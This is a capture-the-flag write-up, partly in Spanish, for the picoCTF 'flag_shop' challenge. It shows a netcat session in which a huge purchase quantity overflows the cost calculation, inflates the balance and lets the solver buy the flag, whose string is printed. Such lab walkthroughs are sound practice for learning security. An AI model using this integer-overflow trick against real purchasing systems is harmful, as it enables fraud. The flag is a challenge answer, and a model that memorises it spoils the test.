# flag_shop

## Objetivo
There's a flag shop selling stuff, can you buy a flag? [Source](https://jupiter.challenges.picoctf.org/static/dd28f0987f28c894f35d5d48564c3402/store.c). Connect with `nc jupiter.challenges.picoctf.org 44566`.

## Solucion
```bash
                                                                                                    
┌──(kali㉿kali)-[~/Downloads]
└─$ nc jupiter.challenges.picoctf.org 44566
Welcome to the flag exchange
We sell flags

1. Check Account Balance

2. Buy Flags

3. Exit

 Enter a menu selection
2
Currently for sale
1. Defintely not the flag Flag
2. 1337 Flag
1       
These knockoff Flags cost 900 each, enter desired quantity
12232121

The final cost is: -1875992988

Your current balance after transaction: 1875994088

Welcome to the flag exchange
We sell flags

1. Check Account Balance

2. Buy Flags

3. Exit

 Enter a menu selection
2
Currently for sale
1. Defintely not the flag Flag
2. 1337 Flag
2
1337 flags cost 100000 dollars, and we only have 1 in stock
Enter 1 to buy one1
YOUR FLAG IS: picoCTF{m0n3y_bag5_68d16363}
Welcome to the flag exchange
We sell flags

1. Check Account Balance

2. Buy Flags

3. Exit
```

## Notas
Lo que nos sugeria la pista que nos daba era hacer un desbordamiento de datos, en este caso al checar el archivo source, que era el que contenia el codigo del programa que se estaba ejecutando, nos damos cuenta que la cantidad de dinero que tenemos es minima por lo que no podremos alcanzar a comprar la bandera. Para ello ingresamos una cantidad algo alta en la opcion que dice que no es la bandera para incrementar nuestro saldo como por ejemplo 12232121, y despues de eso ya podremos comprar la bandera real.

## Referencias